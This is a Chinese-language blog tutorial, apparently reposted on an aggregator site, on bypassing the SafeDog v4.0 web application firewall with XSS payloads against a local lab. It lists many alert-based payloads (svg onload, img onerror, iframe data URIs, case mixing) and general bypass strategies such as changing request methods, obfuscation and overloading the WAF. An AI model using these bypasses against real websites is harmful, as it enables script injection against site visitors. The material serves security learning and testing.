【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析

原文:【WAF 剖析】10 种 XSS 绕过姿势,以及思路分析

xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQ

sql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw

复现

网站安全狗最新v4.0已经准备好

image-20240722104320515

image-20240722104320515

这里用xsslab进行waf绕过测试

image-20240722102257861

image-20240722102257861

还是一样安全狗waf测试

http://192.168.209.149/level1.php?name=<script>alert("hellow world")</script>

image-20240722102220534

image-20240722102220534

基础payload

php

<?php
echo "<script>alert(1)</script>";
?>

img

<img src=javascript:alert("xss")>
<IMG SRC=javascript:alert(String.formCharCode(88,83,83))>
<img scr="URL" style='Xss:expression(alert(xss));'>
<img src="x" onerror=alert(1)>
<img src="x" οnerrοr=eval("alert('xss')")>
<img src=x οnmοuseοver=alert('xss')>

css

<img STYLE="background-image:url(javascript:alert('XSS'))">

form

XSS利用方式1
<form action=javascript:alert('xss') method="get">
<form action=javascript:alert('xss')>
XSS利用方式2
<form method=post action=aa.asp? οnmοuseοver=prompt('xss')>
<form method=post action=aa.asp? οnmοuseοver=alert('xss')>
<form action=1 οnmοuseοver=alert('xss')>

input

<input name="name" value="">
<input value="" οnclick=alert('xss') type="text">
<input name="name" value="" οnmοuseοver=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>

iframe

<iframe src=javascript:alert('xss');height=5width=1000 /><iframe>
<iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe>
<!--原code-->
<iframe src="data:text/html;base64,<script>alert('xss')</script>">
<!--base64编码-->
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" οnmοuseοver=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>

经过测试以上内容皆执行不了,但是还有一个svg没测试

svg!成功了一个,看来v4.0的安全狗没有对svg进行防护,payload如下

<svg onload=alert(1)>

image-20240722103703228

image-20240722103703228

常见的waf绕过payload

1.大小写绕过

<sCript>alert(1)</Script>

image-20240722130044000

image-20240722130044000

2、双写绕过

image-20240722130917202

image-20240722130917202

3、img

image-20240722130953046

image-20240722130953046

4、onmouseover事件

  • <a onmousemove="do something here"> 当用户鼠标移动时即可运行代码

image-20240722131108228

image-20240722131108228

  • <div onmouseover="do something here"> 当用户鼠标在这个块上面时即可运行(可以配合weight等参数将div覆盖页面,鼠标不划过都不行)

image-20240722131353856

image-20240722131353856

5、onclick事件

button

image-20240722131709995

image-20240722131709995

6、onload事件

例如

<svg onload=alert(1)>

之前已经测试过了,svg的onoad事件可以

7、编码脚本绕过关键字

image-20240722132223214

image-20240722132223214

8、主动闭合标签实现注入代码

image-20240722134140300

image-20240722134140300

9、绕过HTML注释符

image-20240722134616530

image-20240722134616530

10、利用换行符绕过

image-20240722134745914

image-20240722134745914

11、绕过右标签

image-20240722134807050

image-20240722134807050

12、绕过</内容>

image-20240722134857902

image-20240722134857902

字典爆破

image-20240722135712030

image-20240722135712030

这个时候直接一个一个去访问即可

image-20240722141703806

image-20240722141703806

这里我们找到一个iframe的payload,尝试访问,成功加载,但是看源码,标签没有闭合

image-20240722141540870

image-20240722141540870

我们在url中闭合这个标签,就可以了

image-20240722141917556

image-20240722141917556

绕过思路

一、更改提交方式

在默认配置下,为了节省资源,许多WAF只会对GET请求进行过滤拦截,而忽略了对POST请求、Cookie、HTTP Header等其他提交方式的检测。因此,攻击者可以尝试更改有害语句的提交方式,如将GET请求修改为POST请求,或者通过Cookie、HTTP Header等方式提交恶意脚本,以绕过WAF的拦截。

二、混淆伪装绕过

混淆伪装是一种常见的绕过WAF的手段,攻击者通过编码、大小写混淆、双写、转义字符等方式对恶意脚本进行伪装,使其绕过WAF的关键词过滤规则。例如,将JavaScript代码中的关键字进行大小写混淆(如<scriPT>),或者使用Unicode编码Base64编码等方式对代码进行编码。

三、标签和事件函数变换

XSS攻击主要是通过触发HTML标签中的事件函数来执行恶意脚本。因此,WAF会重点识别能够触发事件函数的HTML标签和事件函数字段。攻击者可以尝试使用其他可以执行JavaScript代码的HTML标签(如<svg>, <button>, <img>等)替换常用的<script>标签,或者使用其他事件函数(如onerror, oninput, onmousedown等)替换常用的onclick事件函数,以绕过WAF的拦截。

四、利用WAF的缺陷和配置不当

  1. 「增加WAF负担」:有些WAF在处理大量数据时可能会降低检测精度或放弃检测部分数据包。攻击者可以通过向WAF发送大量正常数据包并夹杂异常数据包的方式,增加WAF的负担,从而绕过WAF的检测。

  2. 「利用WAF配置不当」:WAF的配置可能存在漏洞或不当之处,如只检测部分参数、忽略某些类型的请求等。攻击者可以通过分析WAF的配置规则,构造绕过WAF检测的请求。

  3. 「旁站绕过」:在某些情况下,网站管理员可能只对主站进行了WAF防护,而忽略了旁站或子域名的防护。攻击者可以尝试通过旁站或子域名绕过WAF的防护。

五、使用自动化工具

自动化工具如XSStrike等可以帮助攻击者自动测试WAF的防护效果,并生成绕过WAF的payload。这些工具通常包含多种绕过WAF的技巧和策略,可以显著提高攻击的成功率。

XSStrike开源地址:https://github.com/s0md3v/XSStrike

六、其他技巧

  1. 「利用伪协议」:某些HTML属性支持伪协议(如javascript:),攻击者可以利用这些属性执行恶意脚本。

  2. 「利用CSS跨站」:在某些情况下,攻击者可以利用CSS中的某些特性(如expression())执行JavaScript代码。

  3. 「利用全局变量和函数」:JavaScript中的全局变量和函数(如eval(), window.onload等)可以在不直接引用脚本标签的情况下执行代码,攻击者可以尝试利用这些变量和函数绕过WAF的防护。

七、举例

这里我就拿标签事件函数变换来举例、首先判断标签名称,是否可用比如iframe,它可以正常访问,说明<iframe>标签没有进行过滤

http://192.168.209.149/level1.php?name=<iframe>

image-20240722143819570

image-20240722143819570

标签没有进行过滤,尝试闭合这个标签,ok正常访问

image-20240722144155301

image-20240722144155301

判断属性src,好没有过滤

image-20240722144230962

image-20240722144230962

加了个=就被拦截了,这时候没法继续了,换个事件试试

image-20240722144259675

image-20240722144259675

image-20240722144611518

image-20240722144611518

这里拿onload尝试

image-20240722144645731

image-20240722144645731

需要注意的是,以上绕过WAF的思路和技巧仅供学习和研究网络安全使用,不得用于非法攻击和破坏活动。在实际应用中,网站管理员和WAF开发者应不断更新和完善WAF的防护策略,提高网站的安全性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/47839.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Electron 渲染进程直接调用主进程的API库@electron/remote引用讲解

Electron 渲染进程直接调用主进程的API库@electron/remote引用讲解

背景 remote是个老库&#xff0c;早期Electron版本中有个remote对象&#xff0c;这个对象可以横跨所有进程&#xff0c;随意通信&#xff0c;后来官方认为不安全&#xff0c;被干掉了&#xff0c;之后有人利用Electron的IPC通信&#xff0c;底层通过Promise的await能力&#x…
阅读更多...
pytorch lightning报错all tensors to be on the same device

pytorch lightning报错all tensors to be on the same device

RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! 修改指定为gpu trainer pl.Trainer(max_epochstrain_params.iterations, loggertb_logger,acceleratorgpu, devices1)
阅读更多...
Air780EP- AT开发-阿里云应用指南

Air780EP- AT开发-阿里云应用指南

简介 使用AT方式连接阿里云分为一机一密和一型一密两种方式&#xff0c;其中一机一密又包括HTTP认证二次连接和MQTT直连两种方式 关联文档和使用工具&#xff1a; AT固件获取在线加/解密工具阿里云平台 准备工作 Air780EP_全IO开发板一套&#xff0c;包括天线SIM卡&#xff0…
阅读更多...
PHP身份证实名认证接口集成守护电商购物

PHP身份证实名认证接口集成守护电商购物

在这个万物互联的世界里&#xff0c;网购已成为日常生活中不可或缺的一部分。然而&#xff0c;随着线上交易的增加&#xff0c;如何保护消费者和商家免受欺诈&#xff0c;确保每一笔交易的安全&#xff0c;成了亟待解决的难题。这时&#xff0c;身份证实名认证接口应运而生&…
阅读更多...
在Windows安装、部署Tomcat的方法

在Windows安装、部署Tomcat的方法

本文介绍在Windows操作系统中&#xff0c;下载、配置Tomcat的方法。 Tomcat是一个开源的Servlet容器&#xff0c;由Apache软件基金会的Jakarta项目开发和维护&#xff1b;其提供了执行Servlet和Java Server Pages&#xff08;JSP&#xff09;所需的所有功能。其中&#xff0c;S…
阅读更多...
机械学习—零基础学习日志(高数09——函数图形)

机械学习—零基础学习日志(高数09——函数图形)

零基础为了学人工智能&#xff0c;真的开始复习高数 函数图像&#xff0c;开始新的学习&#xff01; 幂函数 利用函数的性质&#xff0c;以幂函数为例&#xff0c;因为单调性相同&#xff0c;利用图中的2和3公式&#xff0c;求最值问题&#xff0c;可以直接将式子进行简化。这…
阅读更多...
贝叶斯算法理论

贝叶斯算法理论

目录 贝叶斯贝叶斯要解决的问题&#xff1a;Why贝叶斯贝叶斯公式实例——拼写纠正模型比较理论垃圾邮件过滤实例 贝叶斯 贝叶斯要解决的问题&#xff1a; **正向概率&#xff1a;**假设袋子里面有N个白球&#xff0c;M个黑球&#xff0c;你伸手进去摸一把&#xff0c;摸出黑球…
阅读更多...
自监督学习在言语障碍及老年语音识别中的应用

自监督学习在言语障碍及老年语音识别中的应用

近几十年来针对正常言语的自动语音识别&#xff08;ASR&#xff09;技术取得了快速进展&#xff0c;但准确识别言语障碍&#xff08;dysarthric&#xff09;和老年言语仍然是一项极具挑战性的任务。言语障碍是一种由多种运动控制疾病引起的常见言语障碍类型&#xff0c;包括脑瘫…
阅读更多...
175道Docker面试题(上)

175道Docker面试题(上)

目录 1、什么是docker&#xff1f; 2、Docker与普通虚拟机的对比&#xff1a; 3、Docker常用命令&#xff1a; 4、Docker镜像是什么&#xff1f; 5、Docker容器是什么&#xff1f; 6、Docker容器有几种状态&#xff1f; 7、Dockerfile中最常见的指令是什么&#xff1f; …
阅读更多...
DP学习——状态模式

DP学习——状态模式

学而时习之&#xff0c;温故而知新。 状态模式 角色 2个角色&#xff0c;引用类&#xff0c;状态行为类。 和策略模式很相似 状态行为封装成很多独立的状态行为类——就是把不同的状态及其要执行的方法单独封装起来。 而策略模式类似&#xff0c;是不同的算法封装成一个个…
阅读更多...
php 根据位置的经纬度计算距离

php 根据位置的经纬度计算距离

在开发中,我们要经常和位置打交道,要计算附近的位置、距离什么的。如下: 一.sql语句 SELECT houseID,title,location,chamber,room,toward,area,rent,is_verify,look_type,look_time, traffic,block_name,images,tag,create_time,update_time, location->&g…
阅读更多...
RKNN执行bash ./build-linux_RK3566_RK3568.sh 报错

RKNN执行bash ./build-linux_RK3566_RK3568.sh 报错

目录 错误信息: 原因:如题提示/3rdparty/mpp/Linux/aarch64/librockchip_mpp.so: file format not recognized; treating as linker script是因为librockchip_mpp.so这个文件夹指向了一个空文件夹 解决方法: 错误信息: /usr/lib/gcc-cross/aarch64-linux-gnu/11/../../..…
阅读更多...
【人工智能】使用Python的dlib库实现人脸识别技术

【人工智能】使用Python的dlib库实现人脸识别技术

&#x1f525; 个人主页&#xff1a;空白诗 文章目录 一、引言二、传统人脸识别技术1. 基于几何特征的方法2. 基于模板匹配的方法3. 基于统计学习的方法 三、深度学习在脸识别中的应用1. 卷积神经网络&#xff08;CNN&#xff09;2. FaceNet和ArcFace 四、使用Python和dlib库实…
阅读更多...
Python @staticmethod、super().__init__()和self

Python @staticmethod、super().__init__()和self

最近在看代码&#xff0c;由于之前没有系统学习过Python&#xff0c;就有些知识点不是很清楚&#xff0c;这里整理一下&#xff0c;方便以后查阅。 Python中的staticmethod\super.init和self Python 装饰器staticmethod和classmethod的作用与区别作用区别代码演示 super() 函数…
阅读更多...
【STM32 HAL库】DMA+串口

【STM32 HAL库】DMA+串口

DMA 直接存储器访问 DMA传输&#xff0c;将数据从一个地址空间复制到另一个地址空间。-----“数据搬运工”。 DMA传输无需CPU直接控制传输&#xff0c;也没有中断处理方式那样保留现场和恢复现场&#xff0c;它是通过硬件为RAM和IO设备开辟一条直接传输数据的通道&#xff0c…
阅读更多...
opencv 优势

opencv 优势

OpenCV(开源计算机视觉库)是一个广泛使用的计算机视觉和机器学习软件框架。它最初由Intel开发,后来由Itseez公司维护,最终于2015年成为非营利组织OpenCV.org的一部分。OpenCV的目的是实现一个易于使用且高效的计算机视觉框架,支持实时视觉应用。 以下是关于OpenCV的一些关…
阅读更多...
浅谈断言之XML断言

浅谈断言之XML断言

浅谈断言之XML断言 XML断言是JMeter的一个组件&#xff0c;用于验证请求的响应数据是否符合XML结构。这对于测试返回XML格式数据的Web服务特别有用。 如何添加XML断言&#xff1f; 要在JMeter测试计划中添加XML断言&#xff0c;遵循以下步骤&#xff1a; 打开测试计划&…
阅读更多...
CentOS 6.8 中部署 Spring Boot 应用程序

CentOS 6.8 中部署 Spring Boot 应用程序

在CentOS 6.8的系统中本来想通过docker或者宝塔免费来快速部署&#xff0c;结果发现CentOS6.8版本比较老&#xff0c;装docker或宝塔面板都非常费劲&#xff0c;算了就用传统的方式来安装吧。 在 CentOS 6.8 中通过传统的方式部署 Spring Boot 应用程序主要涉及以下几个步骤&a…
阅读更多...
Flutter 插件之 easy_refresh(下拉刷新、上拉加载)

Flutter 插件之 easy_refresh(下拉刷新、上拉加载)

今天给大家较少一下日常开发中最常见的一个功能,就是 下拉刷新、上拉加载,这个在我们使用分页功能是最常见的。 此前我我也写了一篇关于 下拉刷新、上拉加载。 Flutter 下拉刷新、上拉加载flutter_easyrefresh的使用https://blog.csdn.net/WangQingLei0307/article/details/…
阅读更多...
Logback 配置文件加载步骤

Logback 配置文件加载步骤

Logback的初始化过程有多个步骤&#xff0c;确保在不同情况下都能找到并加载适当的配置文件。以下是详细的步骤描述&#xff1a; Logback 配置文件加载步骤 检查系统属性 logback.configurationFile Logback 首先检查系统属性 logback.configurationFile 是否设置。如果设置了…
阅读更多...
最新文章

Copyright @ 2022~2023